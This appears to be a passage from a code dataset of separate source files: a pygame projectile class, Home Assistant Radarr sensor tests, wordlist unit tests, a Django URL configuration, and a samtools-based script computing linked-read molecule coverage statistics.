Projectile(pygame.sprite.Sprite):\n\n def __init__(self, player, angle):\n super().__init__()\n self.player = player\n\n self.image = pygame.image.load('assets/projectile.png')\n self.image = pygame.transform.scale(self.image, (50, 50))\n self.origin_image = self.image\n\n self.velocity = 10\n self.rect = self.image.get_rect()\n self.rect.x = player.rect.x + 120\n self.rect.y = player.rect.y + 80\n self.angle_img = 0\n self.f_x = self.rect.x\n self.f_y = self.rect.y\n\n self.angle_proj = angle\n self.change_x = math.cos(self.angle_proj) * self.velocity\n self.change_y = math.sin(self.angle_proj) * self.velocity\n\n def remove(self):\n self.player.all_projectiles.remove(self)\n\n def move(self):\n # self.rotate()\n\n self.f_x += self.change_x\n self.f_y += self.change_y\n self.rect.x = self.f_x\n self.rect.y = self.f_y\n\n for monster in self.player.game.check_collision(self, self.player.game.all_monster):\n self.remove()\n monster.damage(self.player.attack)\n\n if self.rect.x > 1080 or self.rect.y > 720:\n self.remove()\n","sub_path":"Projectile.py","file_name":"Projectile.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"63751122","text":"\"\"\"The tests for Radarr sensor platform.\"\"\"\n\nfrom homeassistant.components.sensor import SensorDeviceClass\nfrom homeassistant.const import ATTR_DEVICE_CLASS, ATTR_UNIT_OF_MEASUREMENT\nfrom homeassistant.core import HomeAssistant\n\nfrom . 
import setup_integration\n\nfrom tests.test_util.aiohttp import AiohttpClientMocker\n\n\nasync def test_sensors(\n hass: HomeAssistant,\n aioclient_mock: AiohttpClientMocker,\n entity_registry_enabled_by_default: None,\n) -> None:\n \"\"\"Test for successfully setting up the Radarr platform.\"\"\"\n await setup_integration(hass, aioclient_mock)\n\n state = hass.states.get(\"sensor.mock_title_disk_space_downloads\")\n assert state.state == \"263.10\"\n assert state.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == \"GB\"\n state = hass.states.get(\"sensor.mock_title_movies\")\n assert state.state == \"1\"\n assert state.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == \"Movies\"\n state = hass.states.get(\"sensor.mock_title_start_time\")\n assert state.state == \"2020-09-01T23:50:20+00:00\"\n assert state.attributes.get(ATTR_DEVICE_CLASS) == SensorDeviceClass.TIMESTAMP\n\n\nasync def test_windows(\n hass: HomeAssistant, aioclient_mock: AiohttpClientMocker\n) -> None:\n \"\"\"Test for successfully setting up the Radarr platform on Windows.\"\"\"\n await setup_integration(hass, aioclient_mock, windows=True)\n\n state = hass.states.get(\"sensor.mock_title_disk_space_tv\")\n assert state.state == \"263.10\"\n","sub_path":"tests/components/radarr/test_sensor.py","file_name":"test_sensor.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"300832696","text":"\"\"\"Unit tests for wordlist module.\"\"\"\nfrom unittest import TestCase, mock, main\nimport wordlist\nfrom request_mock import mocked_requests_get\n\nclass TestWordlist(TestCase):\n \"\"\"Wordlist unit test suite.\"\"\"\n\n @mock.patch('wordlist.requests.get', side_effect=mocked_requests_get)\n def test_word_list_size(self, mock_get):\n \"\"\"Check the size of the list returned is the same as requested.\"\"\"\n word_list = wordlist.get_word_list(20)\n self.assertEqual(len(word_list), 20)\n\n @mock.patch('wordlist.requests.get', side_effect=mocked_requests_get)\n def test_filter_criteria(self, mock_get):\n \"\"\"Check all returned values match filter criteria.\"\"\"\n word_list = wordlist.get_word_list(20)\n for word in word_list:\n self.assertTrue(word.isalpha())\n self.assertTrue(word[0].islower())\n\n @mock.patch('wordlist.requests.get', side_effect=mocked_requests_get)\n def test_no_empty_strings(self, mock_get):\n \"\"\"Check there are no empty strings.\"\"\"\n word_list = wordlist.get_word_list(20)\n for word in word_list:\n self.assertTrue(word)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"test_wordlist.py","file_name":"test_wordlist.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"407091619","text":"from django.conf.urls import url\n\nfrom . 
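# `mocked_requests_get` is imported from a local request_mock module that is
# not included here. A minimal stand-in consistent with how these wordlist
# tests patch wordlist.requests.get (the payload shape is an assumption):
class _FakeResponse:
    def __init__(self, payload, status_code=200):
        self._payload = payload
        self.status_code = status_code

    def json(self):
        return self._payload


def mocked_requests_get(*args, **kwargs):
    # plenty of lowercase alphabetic words so get_word_list(20) can filter
    return _FakeResponse({"words": ["apple", "banana", "cherry"] * 10})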
import views\n\n\napp_name = 'foodapp'\n\nurlpatterns = [\n url(r'^$', views.HomeView.as_view(), name='home'),\n\n url(r'^billing/cards/$', views.StripeCardListView.as_view(), name='stripe_card_list'),\n url(r'^billing/cards/create$', views.StripeCreateView.as_view(), name='stripe_card_create'),\n url(r'^billing/cards/create$', views.StripeCreateView.as_view(), name='stripe_customer_create'),\n url(r'^billing/cards/delete/(?P\\w+)/$', views.StripeCardDeleteView.as_view(), name='stripe_card_delete'),\n url(r'^billing/cards/update/(?P\\w+)/$', views.StripeCardUpdateView.as_view(), name='stripe_card_update'),\n\n url(r'^billing/invoices/$', views.StripeInvoiceView.as_view(), name='stripe_invoices'),\n\n url(r'^burrito-projections/$', views.BurritoProjectionView.as_view(), name='burrito_projections'),\n\n url(r'^orders/$', views.OrderListView.as_view(), name='orders'),\n url(r'^orders/unpaid/$', views.UnpaidOrdersView.as_view(), name='unpaid_orders'),\n url(r'^orders/user/(?P\\w+)/$', views.UserOrderView.as_view(), name='user_orders'),\n url(r'^orders/last_month/$', views.last_month_view, name='last_month_view'),\n url(r'^orders/leaderboard/$', views.LeaderboardView.as_view(), name='leaderboard'),\n url(r'^orders/(?P\\d{4})/(?P\\d{2})/$', views.MonthOrdersView.as_view(), name='month_orders'),\n url(r'^orders/super/(?P\\d{4})/(?P\\d{2})/$', views.SuperMonthOrdersView.as_view(), name='super_month_orders'), # noqa: E501\n]\n","sub_path":"src/labsite/foodapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"532341733","text":"import os, sys, gzip\r\nimport getopt\r\nimport time\r\nimport subprocess\r\nimport re\r\nfrom collections import defaultdict\r\nimport random\r\nimport string\r\n\r\nclass baseinfo:\r\n\tdef __init__(self):\r\n\t\tself.configdist = {}\r\n\r\n\tdef get_config(self, configFile):\r\n\t\to_config = open (configFile, 'r')\r\n\t\tfor config_line in o_config:\r\n\t\t\tconfig_line = config_line.strip()\r\n\t\t\tif len(config_line) == 0:\r\n\t\t\t\tpass\r\n\t\t\telif config_line.startswith('#'):\r\n\t\t\t\tpass\r\n\t\t\telse:\r\n\t\t\t\t(name, path) = re.split(\" = \", config_line)\r\n\t\t\t\tname = name.strip()\r\n\t\t\t\tpath = path.strip()\r\n\t\t\t\tpath = path.replace(\"'\", \"\")\r\n\t\t\t\tpath = path.replace('\"', '')\r\n\r\n\t\t\t\tself.configdist[name] = path\r\n#\t\t\t\tprint (name, path)\r\n\t\to_config.close()\r\n\r\n\tdef get_path(self, name_variable):\r\n\t\tif name_variable in self.configdist:\r\n\t\t\tABS_PATH = self.configdist[name_variable]\r\n\t\t\tif ABS_PATH == \"None\":\r\n\t\t\t\tABS_PATH = \" \"\r\n\t\t\treturn ABS_PATH\r\n\t\telse:\r\n\t\t\tsys.stderr.write(\"ERROR - %s - %s is empty, please check the config file you inputted!\\n\" % (time.asctime(), name_variable))\r\n\t\t\tsys.exit(-1)\r\n\r\n\tdef Samtools(self):\r\n\t\tabs_path = self.get_path('samtools')\r\n\t\treturn abs_path\r\n\r\n\tdef Barcode_index(self):\r\n\t\tabs_path = self.get_path('barcode_index')\r\n\t\treturn abs_path\r\n\r\n\tdef Genomesize(self):\r\n\t\tabs_path = self.get_path('genomesize')\r\n\t\treturn abs_path\r\n\r\nclass CFCR:\r\n\tdef find_samtools_version(self, samtools_path, tmpdir):\r\n\t\trandomstring = ''.join(random.sample(string.ascii_letters + string.digits, 8))\r\n\t\ttmpshell = tmpdir + \"/\" + randomstring + \".sh\"\r\n\t\ttmplog = tmpdir + \"/\" + randomstring + \".log\"\r\n\t\twtmpshell = open(tmpshell, 'w')\r\n\t\tshell_line = \" 
\".join([samtools_path, \"2>\", tmplog, \"\\n\"])\r\n\t\twtmpshell.write(shell_line)\r\n\t\twtmpshell.close()\r\n\t\tsubprocess.call([\"sh\", tmpshell])\r\n\r\n\t\tsv = 0\r\n\t\trlog = open(tmplog, 'r')\r\n\t\tfor log in rlog:\r\n\t\t\tif re.search(\"Version\", log):\r\n\t\t\t\tloginfo = re.split('\\s', log)\r\n\t\t\t\tsv = (re.split('\\.', loginfo[1]))[0]\r\n\t\trlog.close()\r\n\t\tsubprocess.call([\"rm\", tmpshell, tmplog])\r\n\t\treturn(int(sv))\r\n\r\n\tdef split_and_sort_sam(self, sorted_bam, samtools_path, barcode_index, outdir = './'):\r\n\t\tsplitdir = outdir + \"/tmp/SamByChr\"\r\n\t\tif os.path.exists(splitdir):\r\n\t\t\tpass\r\n\t\telse:\r\n\t\t\tos.mkdir(splitdir)\r\n\r\n\t\tsorted_sam = sorted_bam\r\n\t\tif sorted_bam.endswith(\"bam\"):\r\n\t\t\tsorted_sam = sorted_bam.replace('bam', 'sam')\r\n\t\t\ttmpshell = os.path.join(splitdir, \"bam2sam.sh\")\r\n\t\t\twtmpshell = open(tmpshell, 'w')\r\n\t\t\tsortshell = tmpshell + \".tmp\"\r\n\t\t\twsortshell = open(tmpshell + \".tmp\", 'w')\r\n\t\t\ttmpheader = splitdir + \"/tmp.header\"\r\n\t\t\tshell_line = \" \".join([samtools_path, \"view -H\", sorted_bam, \"| grep coordinate >\", tmpheader, \"\\n\"])\r\n\t\t\twsortshell.write(shell_line)\r\n\t\t\twsortshell.close()\r\n\t\t\tsubprocess.call([\"sh\", sortshell])\r\n\t\t\tif os.path.getsize(tmpheader):\r\n\t\t\t\tsys.stderr.write(\"%s has been sorted!\\n\" % sorted_bam)\r\n\t\t\telse:\r\n\t\t\t\tsys.stderr.write(\"%s has not been sorted, and would be sorted before calculating CF/CR!\\n\" % sorted_bam)\r\n\r\n\t\t\t\tsv = self.find_samtools_version(samtools_path, splitdir)\r\n\t\t\t\tif sv == 0:\r\n\t\t\t\t\tshell_line = \" \".join([samtools_path, \"sort -m 2G\", sorted_bam, sorted_bam + \".sorted\\n\"])\r\n\t\t\t\telse:\r\n\t\t\t\t\tshell_line = \" \".join([samtools_path, \"sort -m 2G -o\", sorted_bam + \".sorted.bam -T\", sorted_bam, sorted_bam, \"\\n\"])\r\n\t\t\t\twtmpshell.write(shell_line)\r\n\t\t\t\tshell_line = \" \".join([\"mv\", sorted_bam + \".sorted.bam\", sorted_bam, \"\\n\"])\r\n\t\t\t\twtmpshell.write(shell_line)\r\n\t\t\tshell_line = \" \".join([samtools_path, \"view -h\", sorted_bam, \">\", sorted_sam, \"\\n\"])\r\n\t\t\twtmpshell.write(shell_line)\r\n\t\t\twtmpshell.close()\r\n\t\t\tsubprocess.call([\"sh\", tmpshell])\r\n\r\n\t\tchrdict = dict()\r\n\t\tsplitsamlist = list()\r\n\t\theadersam = os.path.join(splitdir, 'header.sam')\r\n\t\toutputsam = open(headersam, 'w')\r\n\t\trsorted_sam = open(sorted_sam, 'r')\r\n\t\twhile True:\r\n\t\t\tsaminfo = rsorted_sam.readline()\r\n\t\t\tif len(saminfo) == 0:\r\n\t\t\t\tbreak\r\n\t\t\telif saminfo.startswith('@'):\r\n\t\t\t\toutputsam.write(saminfo)\r\n\t\t\telse:\r\n\t\t\t\tsaminfo = saminfo.strip()\r\n\t\t\t\tsaminfolist = re.split(\"\\t\", saminfo)\r\n\t\t\t\tif saminfolist[2] == '*':\r\n\t\t\t\t\tpass\r\n\t\t\t\telif len(chrdict) == 0 or saminfolist[2] not in chrdict:\r\n\t\t\t\t\tchrdict[saminfolist[2]] = saminfolist[2]\r\n\t\t\t\t\toutputsam.close()\r\n\t\t\t\t\tchrsam = os.path.join(splitdir, saminfolist[2] + '.sam')\r\n\t\t\t\t\toutputsam = open(chrsam, 'w')\r\n\t\t\t\t\tsplitsamlist.append(chrsam)\r\n\t\t\t\t\tsys.stderr.write(\"[ %s ] split sorted sam file, processing %s: %s ...\\n\" % (time.asctime(), saminfolist[2], chrsam))\r\n\t\t\t\t\t### move the barcode info to the 12th column\r\n\t\t\t\t\tsaminfo = self.modify_saminfo(saminfo)\r\n\t\t\t\t\toutputsam.write(saminfo)\r\n\t\t\t\telse:\r\n\t\t\t\t\tsaminfo = 
self.modify_saminfo(saminfo)\r\n\t\t\t\t\toutputsam.write(saminfo)\r\n\t\toutputsam.close()\r\n\t\t\r\n\t\tsamfilepath = os.path.join(splitdir, \"sam.txt\")\r\n\t\twsamfilepath = open(samfilepath, 'w')\r\n\t\tfor chrsam in splitsamlist:\r\n\t\t\tchrsortedsam = chrsam.replace('sam', 'sorted_by_barcode.sam')\r\n\t\t\tsys.stderr.write(\"[ %s ] sort sam file, processing %s ...\\n\" % (time.asctime(), chrsortedsam))\r\n\t\t\ttmpshell = os.path.join(splitdir, \"sort.sh\")\r\n\t\t\twtmpshell = open(tmpshell, \"w\")\r\n\t\t\tshell_line = \" \".join([\"sort\", \"-k12,12 -k4n\", chrsam, \">\", chrsortedsam, \"\\n\"])\r\n\t\t\twtmpshell.write(shell_line)\r\n\t\t\tshell_line = \" \".join([\"rm\", chrsam, \"\\n\"])\r\n\t\t\twtmpshell.write(shell_line)\r\n\t\t\twtmpshell.close()\r\n\t\t\tsubprocess.call([\"sh\", tmpshell])\r\n\t\t\twsamfilepath.write(\"\\n\".join([chrsortedsam, \"\"]))\r\n\t\twsamfilepath.close()\r\n\r\n\t\tsubprocess.call([\"rm\", sorted_sam])\r\n\r\n\t\treturn(samfilepath, headersam)\r\n\r\n\tdef modify_saminfo(self, orisaminfo):\r\n\t\tsaminfolist = re.split(\"\\t\", orisaminfo)\r\n\t\tbcindex = 1\r\n\t\tfor n in range(len(saminfolist)):\r\n\t\t\tif saminfolist[n].startswith(\"BX:Z\"):\r\n\t\t\t\tbcindex = n\r\n\t\tif bcindex == 11 or bcindex == 1:\r\n\t\t\tsaminfo = \"\\t\".join(saminfolist)\r\n\t\telse:\r\n\t\t\tnewsaminfolist = saminfolist[0:11]\r\n\t\t\tnewsaminfolist.append(saminfolist[bcindex])\r\n\t\t\tfor n in range(11, bcindex):\r\n\t\t\t\tnewsaminfolist.append(saminfolist[n])\r\n\t\t\tif bcindex == (len(saminfolist) - 1):\r\n\t\t\t\tpass\r\n\t\t\telse:\r\n\t\t\t\tfor n in range(bcindex+1, len(saminfolist)):\r\n\t\t\t\t\tnewsaminfolist.append(saminfolist[n])\r\n\t\t\tsaminfo = \"\\t\".join(newsaminfolist)\r\n\t\tsaminfo = saminfo + \"\\n\"\r\n\t\treturn(saminfo)\r\n\r\n\tdef calculate(self, sorted_by_barcode_sam_list, target_size, outdir, sorted_bam, samtools_path, molecule_length, headersamfile):\r\n\t\tsamfile_list = open(sorted_by_barcode_sam_list, 'r')\r\n\t\tstatistics_report_dir = os.path.join(outdir, \"statistics\")\r\n\t\tif os.path.isdir(statistics_report_dir):\r\n\t\t\tpass\r\n\t\telse:\r\n\t\t\tos.makedirs(statistics_report_dir)\r\n\t\tmarked_molecule = os.path.join(statistics_report_dir, \"molecule.full.gz\")\r\n\t\twmarked_molecule = gzip.open(marked_molecule, 'wb')\r\n#\t\tbroken_molecule = os.path.join(statistics_report_dir, \"molecule.broken.txt\")\r\n#\t\twbroken_molecule = open(broken_molecule, 'w')\r\n\r\n\t\tmol_id = 1\r\n\t\tall_CF = 0\r\n\t\tall_CR = 0\r\n\t\tallbarcode = dict()\r\n\t\treadid_dict = defaultdict(int)\r\n\t\tmolecule = defaultdict(list)\r\n\t\tmolecule2 = defaultdict(list)\r\n\t\tmolecule3 = defaultdict(int)\r\n\t\tmolecule4 = defaultdict(list)\r\n\r\n\t\tmolecule_length_distribution = dict()\r\n\t\tbarcode_molecule_amount = defaultdict(dict)\r\n\t\tmolecule_really_covered = defaultdict(list)\r\n\t\tmolecule_coverage_distribution = defaultdict(int)\r\n\t\tmolecule_coverage_distribution_sum = 0\r\n\r\n#\t\tbarcode_molecule_amount_file = os.path.join(statistics_report_dir, \"barcode_molecule_amount.txt\")\r\n#\t\twbarcode_molecule_amount_file = open(barcode_molecule_amount_file, \"w\")\r\n#\t\twbarcode_molecule_amount_file.write(\"barcode\\tamount_of_molecule\\n\")\r\n\r\n\t\tmolecule_really_covered_file = os.path.join(statistics_report_dir, \"each_molecule_coverage.txt\")\r\n\t\twmolecule_really_covered_file = open(molecule_really_covered_file, 
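# modify_saminfo() relocates the BX:Z barcode tag into column 12 so that the
# later `sort -k12,12 -k4n` groups alignments by barcode and then by start
# position. A worked example with made-up field values:
def _demo_modify_saminfo():
    fields = ["r1", "0", "chr1", "100", "60", "4M", "*", "0", "0",
              "ACGT", "IIII", "NM:i:0", "BX:Z:ACGTACGT-1", "MD:Z:4"]
    moved = CFCR().modify_saminfo("\t".join(fields))
    assert moved.split("\t")[11] == "BX:Z:ACGTACGT-1"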
\"w\")\r\n\t\twmolecule_really_covered_file.write(\"molecule_id\\tmolecule_length\\tcovered\\tcoverage\\n\")\r\n\r\n\t\tmolecule_coverage_distribution_file = os.path.join(statistics_report_dir, \"molecule_coverage_distribution.txt\")\r\n\t\twmolecule_coverage_distribution_file = open(molecule_coverage_distribution_file, \"w\")\r\n\t\twmolecule_coverage_distribution_file.write(\"coverage\\tproportion(%)\\n\")\r\n\r\n\t\tfilter_molecule_bam_list = list()\r\n\t\tfailed_molecule_bam_list = list()\r\n\t\tfor sam in samfile_list:\r\n\t\t\tsam = sam.strip()\r\n\t\t\tsys.stderr.write(\"[ %s ] processing: %s \\n\" %(time.asctime(), sam))\r\n\t\t\tsamfile = open(sam, 'r')\r\n\r\n\t\t\ttmpsaminfodict = dict()\r\n\t\t\tif molecule_length > 0:\r\n\t\t\t\tmolecule_pass = 0\r\n\t\t\t\tfiltered_samfile = sam.replace(\"sorted_by_barcode.sam\", \"sorted_by_barcode.filtered.sam\")\r\n\t\t\t\tfailed_samfile = sam.replace(\"sorted_by_barcode.sam\", \"sorted_by_barcode.failed.sam\")\r\n\t\t\t\ttmpshell = filtered_samfile + \".sh\"\r\n\t\t\t\twtmpshell = open(tmpshell, 'w')\r\n\t\t\t\tshell_line = \" \".join([samtools_path, \"view -H\", sorted_bam, \"| grep -v coordinate >\", filtered_samfile, \"\\n\"])\r\n\t\t\t\twtmpshell.write(shell_line)\r\n\t\t\t\tshell_line = \" \".join([samtools_path, \"view -H\", sorted_bam, \"| grep -v coordinate >\", failed_samfile, \"\\n\"])\r\n\t\t\t\twtmpshell.write(shell_line)\r\n\t\t\t\twtmpshell.close()\r\n\t\t\t\tsubprocess.call([\"sh\", tmpshell])\r\n\t\t\t\tsubprocess.call([\"rm\", tmpshell])\r\n\r\n\t\t\t\twfiltered_samfile = open(filtered_samfile, 'a')\r\n\t\t\t\twfailed_samfile = open(failed_samfile, 'a')\r\n\r\n\t\t\twhile True:\r\n\t\t\t\tsaminfo = samfile.readline().strip()\r\n\t\t\t\tsaminfolist = re.split(\"\\t\", saminfo)\r\n\r\n\t\t\t\tif len(saminfo) == 0:\r\n\t\t\t\t\tbreak\r\n\t\t\t\telif saminfolist[5] == \"*\":\r\n\t\t\t\t\tsaminfo = saminfo + \"\\n\"\r\n\t\t\t\t\twfailed_samfile.write(saminfo)\r\n\t\t\t\telse:\r\n\t\t\t\t\tif saminfolist[0] in tmpsaminfodict:\r\n\t\t\t\t\t\ttmpsaminfodict[saminfolist[0]] += \"\\n\" + saminfo\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\ttmpsaminfodict[saminfolist[0]] = saminfo\r\n\t\t\t\t\tbarcode_field = [s for s in saminfolist if \"BX:Z:\" in s]\r\n\t\t\t\t\tif barcode_field != []:\r\n\t\t\t\t\t\tbc = barcode_field[0].split(\":\")[2].split(\"-\")[0]\r\n\t\t\t\t\t\tstart_pos = int(saminfolist[3])\r\n\t\t\t\t\t\treadlength = len(saminfolist[9])\r\n\t\t\t\t\t\tend_pos = start_pos + readlength - 1\r\n\t\t\t\t\t\tchrid = saminfolist[2]\r\n\t\t\t\t\t\tif bc not in allbarcode:\t\r\n\t\t\t\t\t\t\tif len(allbarcode) == 0:\r\n\t\t\t\t\t\t\t\tallbarcode[bc] = bc\r\n\t\t\t\t\t\t\t\treadid_dict[saminfolist[0]] = 1\r\n\t\t\t\t\t\t\t\tmolecule[mol_id].append(start_pos)\r\n\t\t\t\t\t\t\t\tmolecule2[mol_id].append(end_pos)\r\n\t\t\t\t\t\t\t\tmolecule3[mol_id] = readlength\r\n\t\t\t\t\t\t\t\tmolecule4[mol_id].append(saminfo)\r\n\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\tse_num = 0\r\n\t\t\t\t\t\t\t\tpe_num = 0\r\n\t\t\t\t\t\t\t\tfor readid_ in readid_dict.keys():\r\n\t\t\t\t\t\t\t\t\tif readid_dict[readid_] == 2:\r\n\t\t\t\t\t\t\t\t\t\tpe_num += 1\r\n\t\t\t\t\t\t\t\t\telif readid_dict[readid_] == 1:\r\n\t\t\t\t\t\t\t\t\t\tse_num += 1\r\n\t\t\t\t\t\t\t\tif pe_num >= 2 or se_num >= 4 or (pe_num >= 1 and se_num >= 2):\r\n\t\t\t\t\t\t\t\t\tbarcodeinfo = sorted(allbarcode.keys())\r\n\t\t\t\t\t\t\t\t\tminpos = min(molecule[mol_id])\r\n\t\t\t\t\t\t\t\t\tmaxpos = max(molecule2[mol_id])\r\n\t\t\t\t\t\t\t\t\tall_CR += molecule3[mol_id]\r\n\t\t\t\t\t\t\t\t\tsmall_cf = 
maxpos - minpos + 1\r\n\t\t\t\t\t\t\t\t\tall_CF += small_cf\r\n\t\t\t\t\t\t\t\t\tqn = len(molecule[mol_id])\r\n\t\t\t\t\t\t\t\t\tfor eachinfo in molecule4[mol_id]:\r\n\t\t\t\t\t\t\t\t\t\tinfo_detail_list = re.split(\"\\t\", eachinfo)\r\n\t\t\t\t\t\t\t\t\t\tif small_cf not in molecule_length_distribution:\r\n\t\t\t\t\t\t\t\t\t\t\tmolecule_length_distribution[small_cf] = 1\r\n\t\t\t\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\t\t\t\tmolecule_length_distribution[small_cf] += 1\r\n\t\t\t\t\t\t\t\t\t\toutmoleculeinfo = \"\\t\".join([chrid, str(minpos), str(maxpos), str(small_cf), str(qn), barcodeinfo[0], str(mol_id), info_detail_list[0], info_detail_list[1], str(len(info_detail_list[9]))]) + \"\\n\"\r\n\r\n\t\t\t\t\t\t\t\t\t\tif barcodeinfo[0] not in barcode_molecule_amount:\r\n\t\t\t\t\t\t\t\t\t\t\tbarcode_molecule_amount[barcodeinfo[0]][mol_id] = 1\r\n\t\t\t\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\t\t\t\tif mol_id not in barcode_molecule_amount[barcodeinfo[0]]:\r\n\t\t\t\t\t\t\t\t\t\t\t\tbarcode_molecule_amount[barcodeinfo[0]][mol_id] = 1\r\n\r\n\t\t\t\t\t\t\t\t\t\tif mol_id not in molecule_really_covered:\r\n\t\t\t\t\t\t\t\t\t\t\tmolecule_really_covered[mol_id].append(small_cf)\r\n\t\t\t\t\t\t\t\t\t\t\tmolecule_really_covered[mol_id].append(len(info_detail_list[9]))\r\n\t\t\t\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\t\t\t\tmolecule_really_covered[mol_id][1] += len(info_detail_list[9])\r\n\r\n\t\t\t\t\t\t\t\t\t\tif molecule_length > 0 and molecule_length < small_cf:\r\n\t\t\t\t\t\t\t\t\t\t\tmolecule_pass = 1\r\n\t\t\t\t\t\t\t\t\t\t\tpass_filtered_info_list = info_detail_list[0:11]\r\n\t\t\t\t\t\t\t\t\t\t\tfor tag_info in range(11, len(info_detail_list)):\r\n\t\t\t\t\t\t\t\t\t\t\t\tif info_detail_list[tag_info].startswith(\"BI:Z:\") or info_detail_list[tag_info].startswith(\"BD:Z:\"):\r\n\t\t\t\t\t\t\t\t\t\t\t\t\tpass\r\n\t\t\t\t\t\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\t\t\t\t\t\tpass_filtered_info_list.append(info_detail_list[tag_info])\r\n\t\t\t\t\t\t\t\t\t\t\tpass_filtered_info = \"\\t\".join(pass_filtered_info_list) + \"\\n\"\r\n\t\t\t\t\t\t\t\t\t\t\twfiltered_samfile.write(pass_filtered_info)\r\n\t\t\t\t\t\t\t\t\t\twmarked_molecule.write(outmoleculeinfo.encode())\r\n\t\t\t\t\t\t\t\t\tmol_id += 1\r\n\t\t\t\t\t\t\t\t\ttmpsaminfodict = dict()\r\n\t\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\t\tfor readid_ in tmpsaminfodict.keys():\r\n\t\t\t\t\t\t\t\t\t\tbroken_info = tmpsaminfodict[readid_] + \"\\n\"\r\n\t\t\t\t\t\t\t\t\t\twfailed_samfile.write(broken_info)\r\n\t\t\t\t\t\t\t\t\ttmpsaminfodict = dict()\r\n\r\n#\t\t\t\t\t\t\t\tfor barcode_molecule_barcode in barcode_molecule_amount.keys():\r\n#\t\t\t\t\t\t\t\t\tseparate_num = len(barcode_molecule_amount[barcode_molecule_barcode].keys())\r\n#\t\t\t\t\t\t\t\t\tinfo = barcode_molecule_barcode + \"\\t\" + str(separate_num) + \"\\n\"\r\n#\t\t\t\t\t\t\t\t\twbarcode_molecule_amount_file.write(info)\r\n\r\n\t\t\t\t\t\t\t\tfor mol_id_key in molecule_really_covered.keys():\r\n\t\t\t\t\t\t\t\t\tsmall_cfcf_rate = 1.0 * molecule_really_covered[mol_id_key][1] / molecule_really_covered[mol_id_key][0]\r\n\t\t\t\t\t\t\t\t\tinfo = str(mol_id_key) + \"\\t\" + str(molecule_really_covered[mol_id_key][0]) + \"\\t\" + str(molecule_really_covered[mol_id_key][1]) + \"\\t\" + str(small_cfcf_rate) + \"\\n\"\r\n\t\t\t\t\t\t\t\t\twmolecule_really_covered_file.write(info)\r\n\r\n\t\t\t\t\t\t\t\t\tsmall_cfcf_rate_expand = int(100 * small_cfcf_rate)\r\n\t\t\t\t\t\t\t\t\tmolecule_coverage_distribution[small_cfcf_rate_expand] += 1\r\n\t\t\t\t\t\t\t\t\tmolecule_coverage_distribution_sum += 
1\r\n\r\n\t\t\t\t\t\t\t\tmolecule_really_covered = defaultdict(list)\r\n\t\t\t\t\t\t\t\tbarcode_molecule_amount = defaultdict(dict)\r\n\t\t\t\t\t\t\t\tallbarcode = dict()\r\n\t\t\t\t\t\t\t\treadid_dict = defaultdict(int)\r\n\t\t\t\t\t\t\t\tmolecule = defaultdict(list)\r\n\t\t\t\t\t\t\t\tmolecule2 = defaultdict(list)\r\n\t\t\t\t\t\t\t\tmolecule3 = defaultdict(int)\r\n\t\t\t\t\t\t\t\tmolecule4 = defaultdict(list)\r\n\t\t\t\t\t\t\t\tallbarcode[bc] = bc\r\n\t\t\t\t\t\t\t\treadid_dict[saminfolist[0]] = 1\r\n\t\t\t\t\t\t\t\tmolecule[mol_id].append(start_pos)\r\n\t\t\t\t\t\t\t\tmolecule2[mol_id].append(end_pos)\r\n\t\t\t\t\t\t\t\tmolecule3[mol_id] = readlength\r\n\t\t\t\t\t\t\t\tmolecule4[mol_id].append(saminfo)\r\n\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\tdist = start_pos - molecule[mol_id][-1]\r\n\t\t\t\t\t\t\tif dist < 50000:\r\n\t\t\t\t\t\t\t\treadid_dict[saminfolist[0]] += 1\r\n\t\t\t\t\t\t\t\tmolecule[mol_id].append(start_pos)\r\n\t\t\t\t\t\t\t\tmolecule2[mol_id].append(end_pos)\r\n\t\t\t\t\t\t\t\tmolecule3[mol_id] += readlength\r\n\t\t\t\t\t\t\t\tmolecule4[mol_id].append(saminfo)\r\n\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\tse_num = 0\r\n\t\t\t\t\t\t\t\tpe_num = 0\r\n\t\t\t\t\t\t\t\tfor readid_ in readid_dict.keys():\r\n\t\t\t\t\t\t\t\t\tif readid_dict[readid_] == 2:\r\n\t\t\t\t\t\t\t\t\t\tpe_num += 1\r\n\t\t\t\t\t\t\t\t\telif readid_dict[readid_] == 1:\r\n\t\t\t\t\t\t\t\t\t\tse_num += 1\r\n\t\t\t\t\t\t\t\tif pe_num >= 2 or se_num >= 4 or (pe_num >= 1 and se_num >= 2):\r\n\t\t\t\t\t\t\t\t\tminpos = min(molecule[mol_id])\r\n\t\t\t\t\t\t\t\t\tmaxpos = max(molecule2[mol_id])\r\n\t\t\t\t\t\t\t\t\tall_CR += molecule3[mol_id]\r\n\t\t\t\t\t\t\t\t\tsmall_cf = maxpos - minpos + 1\r\n\t\t\t\t\t\t\t\t\tall_CF += small_cf\r\n\t\t\t\t\t\t\t\t\tqn = len(molecule[mol_id])\r\n\t\t\t\t\t\t\t\t\tbarcodeinfo = sorted(allbarcode.keys())\r\n\t\t\t\t\t\t\t\t\tfor eachinfo in molecule4[mol_id]:\r\n\t\t\t\t\t\t\t\t\t\tinfo_detail_list = re.split(\"\\t\", eachinfo)\r\n\t\t\t\t\t\t\t\t\t\tif small_cf not in molecule_length_distribution:\r\n\t\t\t\t\t\t\t\t\t\t\tmolecule_length_distribution[small_cf] = 